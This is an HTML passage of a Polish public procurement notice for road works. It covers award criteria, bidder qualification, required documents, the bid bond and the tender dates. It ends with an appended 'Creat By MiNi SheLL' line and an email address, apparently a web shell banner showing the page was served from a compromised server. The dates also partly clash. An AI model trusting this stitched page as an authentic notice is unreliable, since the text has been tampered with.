rękojmi spośród złożonych <br/> ofert [w miesiącach]<br/>* Najkrótszy możliwy okres gwarancji i rękojmi wymagany przez Zamawiającego: 24 miesiące. <br/> Najdłuższy możliwy okres gwarancji i rękojmi: 60 miesięcy. Wykonawca może zadeklarować<br/> termin gwarancji i rękojmi w następujących okresach: 24 lub 36 lub 48 lub 60 miesięcy.<br/>W przypadku gdy Wykonawca nie wpisze w Formularzu Oferty oferowanego okresu gwarancji i rękojmi Zamawiający uzna, że Wykonawca zaoferował minimalny okres gwarancji i rękojmi.<br/>W przypadku zaoferowania okresu gwarancji i rękojmi dłuższego niż 60 miesięcy Zamawiający przyzna Wykonawcy maksymalną liczbę punktów tj. 40.<br/>W przypadku zaoferowania okresu gwarancji i rękojmi krótszego niż 24 miesiące Zamawiający odrzuci ofertę ponieważ jej treść będzie niezgodna z warunkami zamówienia.<br/>6. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>7. Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą sumę punktów za wszystkie kryteria łącznie, zgodnie ze wzorem:<br/>P = C + G<br/>gdzie:<br/>P – suma punktów przyznanych Wykonawcy za wszystkie kryteria<br/>C – liczba punktów przyznanych Wykonawcy za kryterium Cena brutto<br/>G – liczba punktów przyznanych Wykonawcy za kryterium Okres gwarancji i rękojmi.<br/>8. Zamawiający dla potrzeb oceny oferty, której wybór prowadziłby do powstania obowiązku podatkowego dla zamawiającego, zgodnie z przepisami o podatku od towarów i usług, doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu; <br/>2)	spełniają warunki udziału w postępowaniu, określone w ogłoszeniu o zamówieniu oraz niniejszej specyfikacji warunków zamówienia.<br/>2. Warunki udziału w postępowaniu dotyczą:<br/>1)	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej;<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej;<br/>Wymagane jest posiadanie przez wykonawcę odpowiedniego ubezpieczenia odpowiedzialności cywilnej na kwotę nie mniejszą niż 1.000.000,00 zł. brutto.<br/>4)	zdolności technicznej lub zawodowej;<br/>a) zdolność techniczna<br/>Warunek zostanie spełniony jeśli Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał:<br/>Dot. zadania nr 1:<br/>co najmniej jedną robotę budowlaną polegającą na budowie, rozbudowie, przebudowie lub remoncie drogi, o wartości nie mniejszej niż 1.000.000,00 zł. brutto.<br/>Dot. zadania nr 2:<br/>co najmniej jedną robotę budowlaną polegającą na budowie, rozbudowie, przebudowie lub remoncie drogi, o wartości nie mniejszej niż 1.000.000,00 zł. brutto.<br/>b) zdolność techniczna:<br/>Do wykonania przedmiotowego zadani zamawiający wymaga dysponowania przez wykonawcę następującym sprzętem: <br/>1.	Wytwórnia (otaczarka) o mieszaniu cyklicznym lub ciągłym, z automatycznym komputerowym sterowaniem produkcji, do wytwarzania mieszanek mineralno – asfaltowych - 1 sztuka<br/>2.	Układarka do układania mieszanek mineralno – asfaltowych z elektronicznym sterowaniem równości układanej warstwy - 1 sztuka<br/>3.	Skrapiarka - 1 sztuka<br/>c) Zdolność zawodowa:<br/>Warunek zostanie spełniony, jeśli Wykonawca wykaże, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia tj.:<br/>Kierownik Budowy (Przedstawiciel Wykonawcy) posiadający: <br/>•	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub równoważne wydane na podstawie wcześniej obowiązujących przepisów,<br/>•	co najmniej 2-letnie doświadczenie zawodowe jako kierownik Budowy.<br/>Zamawiający, określając wymogi dla osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane, a także ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (tj. Dz. U. z 2020 r., poz. 220 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)<br/>dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>Jeżeli z uzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez zamawiającego podmiotowych środków<br/>dowodowych, o których mowa w pkt. 1, wykonawca składa inne podmiotowe środki dowodowe, które w wystarczający sposób<br/>potwierdzają spełnianie opisanego przez zamawiającego warunku udziału w postępowaniu dotyczącego sytuacji ekonomicznej lub<br/>finansowej.<br/>Ogłoszenie nr 2022/BZP 00178947/01 z dnia 2022-05-26<br/>2022-05-26 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>2) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz<br/>podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane,<br/>a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>3) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>4) wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru<br/>lub ewidencji.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składają się następujące dokumenty i załączniki:<br/>1) Formularz ofertowy wykonawcy – wypełniony i podpisany przez wykonawcę.<br/>2) Kosztorysy ofertowe w zakresie wybranych przez wykonawcę zadań od 1 do 2 (załączniki nr 1÷2 do formularza<br/>ofertowego) – wypełnione i podpisane przez wykonawcę.<br/>3) Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu oraz o nie podleganiu wykluczeniu -<br/>wypełnione i podpisane przez wykonawcę. Oświadczenie to stanowi dowód potwierdzający brak podstaw wykluczenia,<br/>spełnianie warunków udziału w postępowaniu odpowiednio na dzień składania ofert, stanowi dowód tymczasowo<br/>zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>4) Dokument o którym mowa w pkt. VI.3. ppkt. 3) SWZ (zobowiązanie podmiotu udostępniającego zasoby) jeżeli<br/>Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach technicznych lub<br/>zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów.<br/>5) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z własnym oświadczeniem, o którym mowa w pkt 3, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby.<br/>6) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 3 składa<br/>każdy z Wykonawców w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>7) W przypadku, o którym mowa w art. 117 ust. 3 ustawy Pzp, wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonują poszczególni wykonawcy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> dla zadania nr 1 w wysokości: 8.500,00 zł., <br/> słownie: osiem tysięcy pięćset złotych 00/100.<br/>2.2. dla zadania nr 2 w wysokości: 20.000,00 zł., <br/> słownie: dwadzieścia tysięcy złotych 00/100.<br/>3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:<br/> 1)	w pieniądzu, <br/> 2)	w gwarancjach bankowych, <br/> 3)	w gwarancjach ubezpieczeniowych, <br/> 4)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 <br/> ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/> Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy zamawiającego: <br/>Bank: BNP Paribas Bank Polska SA ul. Kasprzaka 2, 01-211 Warszawa<br/>Numer: 79 1600 1462 1808 5836 4000 0003<br/>z adnotacją: &#34;wadium - Nazwa zadania &#34;<br/>5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>6. Wadium wniesione w pieniądzu należy złożyć z odpowiednim wyprzedzeniem, tak aby wpłynęło ono na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.<br/>7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium w postaci elektronicznej nie może zawierać postanowień uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu gwarancyjnego do Gwaranta.<br/>8. Poręczenie, gwarancja lub inny dokument stanowiący wadium winno zawierać w swojej treści nieodwołalne i bezwarunkowe zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium na pierwsze pisemne żądanie Zamawiającego. Dokument ten winien obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium, określone w art. 98 ust. 6 ustawy Pzp. <br/>9. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji warunków zamówienia form wadium (niewniesienie wadium lub wniesienie w sposób nieprawidłowy) oferta wykonawcy podlegać będzie odrzuceniu.<br/>10. Zamawiający zwróci wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>1) upływu terminu związania ofertą,<br/>2) zawarcia umowy w sprawie zamówienia publicznego,<br/>3) unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji, gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, zobowiązani są oni wykazać spełnienie warunków udziału w postępowaniu wspólnie.<br/>a) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w Postępowaniu, albo reprezentowania w Postępowaniu i zawarcia umowy. Treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest upoważniony (zakres umocowania). Pełnomocnictwo należy załączyć do oferty.<br/>b)	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, każdy z Wykonawców składa ”Oświadczenie z art. 125 ust 1 ustawy Pzp”. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Wzór oświadczenia stanowi załącznik do SWZ.<br/>c)	Podmiotowe środki dowodowe potwierdzające brak podstaw wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <br/>d)	Wykonawcy ubiegający się wspólnie o zamówienie odpowiadają solidarnie za wykonanie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określone zostały we wzorze umowy stanowiącym załącznik nr 6 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez https://miniportal.uzp.gov.pl, na adres: /MPNR1/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-24</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com